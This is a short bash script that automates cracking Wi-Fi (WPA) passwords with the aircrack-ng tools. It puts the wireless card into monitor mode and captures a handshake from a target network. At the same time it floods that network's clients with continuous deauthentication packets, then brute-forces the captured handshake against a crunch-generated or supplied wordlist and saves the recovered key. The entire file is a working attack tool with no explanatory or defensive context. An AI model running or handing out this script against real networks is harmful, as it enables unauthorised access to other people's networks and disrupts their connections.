#!/bin/bash
Choice=$1
BSSID=$2
channel=$3
ESSID=$4
Min=$5
Max=$6
Password=$7
WordList=$8
airmon-ng check kill
airmon-ng start wlan0
ifconfig wlan0mon down
iwconfig wlan0mon channel $channel
ifconfig wlan0mon up
xterm -e airodump-ng --bssid $BSSID -c $channel -w scripts/Handshake wlan0mon &
xterm -e aireplay-ng -0 0 -a $BSSID wlan0mon
if [ $Choice -eq 0 ]
then
crunch $Min $Max -t $Password > scripts/wordtest.txt
aircrack-ng -w scripts/wordtest.txt -b $BSSID scripts/Handshake-01.cap > scripts/passwordkey.txt
else
aircrack-ng -w $WordList -b $BSSID scripts/Handshake-01.cap > scripts/passwordkey.txt
fi
rm scripts/Handshake*
airmon-ng stop wlan0mon
service NetworkManager restart
sleep 10s